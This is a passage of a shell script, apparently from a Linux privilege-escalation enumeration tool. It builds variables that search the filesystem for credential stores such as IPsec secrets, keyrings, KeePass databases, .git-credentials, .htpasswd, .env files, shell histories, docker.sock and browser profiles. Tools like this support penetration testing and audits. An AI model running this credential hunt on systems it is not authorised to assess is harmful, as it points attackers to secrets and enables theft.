"$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70) - PSTORAGE_GMV_AUTH=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70) - PSTORAGE_IPSEC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70) - PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.irssi$" | sort | uniq | head -n 70) - PSTORAGE_KEYRING=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70) - PSTORAGE_FILEZILLA=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "filezilla$|filezilla\.xml$|recentservers\.xml$" | sort | uniq | head -n 70) - PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70) - PSTORAGE_SPLUNK=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "passwd$" | sort | uniq | head -n 70) - PSTORAGE_GITLAB=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E '/lib' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70) - PSTORAGE_PGP_GPG=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E 'README.gnupg' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.pgp$|.*\.gpg$|.*\.gnupg$" | sort | uniq | head -n 70) - PSTORAGE_CACHE_VI=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70) - PSTORAGE_DOCKER=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$" | sort | uniq | head -n 70) - PSTORAGE_FIREFOX=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^" | grep -E "\.mozilla$|Firefox$" | sort | uniq | head -n 70) - PSTORAGE_CHROME=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^" | grep -E "google-chrome$|Chrome$" | sort | uniq | head -n 70) - PSTORAGE_OPERA=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^" | grep -E "com\.operasoftware\.Opera$" | sort | uniq | head -n 70) - PSTORAGE_SAFARI=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^" | grep -E "Safari$" | sort | uniq | head -n 70) - PSTORAGE_AUTOLOGIN=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70) - PSTORAGE_FASTCGI=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "fastcgi_params$" | sort | uniq | head -n 70) - PSTORAGE_SNMP=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_PYPIRC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.pypirc$" | sort | uniq | head -n 70) - PSTORAGE_POSTFIX=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "postfix$" | sort | uniq | head -n 70) - PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.cloudflared$" | sort | uniq | head -n 70) - PSTORAGE_HISTORY=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\..*_history\..*$" | sort | uniq | head -n 70) - PSTORAGE_HTTP_CONF=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "httpd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_HTPASSWD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.htpasswd$" | sort | uniq | head -n 70) - PSTORAGE_LDAPRC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.ldaprc$" | sort | uniq | head -n 70) - PSTORAGE_ENV=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.env$" | sort | uniq | head -n 70) - PSTORAGE_MSMTPRC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.msmtprc$" | sort | uniq | head -n 70) - PSTORAGE_INFLUXDB=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "influxdb\.conf$" | sort | uniq | head -n 70) - PSTORAGE_ZABBIX=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "zabbix_server\.conf$|zabbix_agentd\.conf$|zabbix$" | sort | uniq | head -n 70) - PSTORAGE_GITHUB=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70) - PSTORAGE_SVN=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.svn$" | sort | uniq | head -n 70) - PSTORAGE_KEEPASS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70) - PSTORAGE_FTP=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|sites\.ini$|wcx_ftp\.ini$|winscp\.ini$|ws_ftp\.ini$" | sort | uniq | head -n 70) - PSTORAGE_BIND=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/etc|^/usr|^/var" | grep -E "bind$" | sort | uniq | head -n 70) - PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E 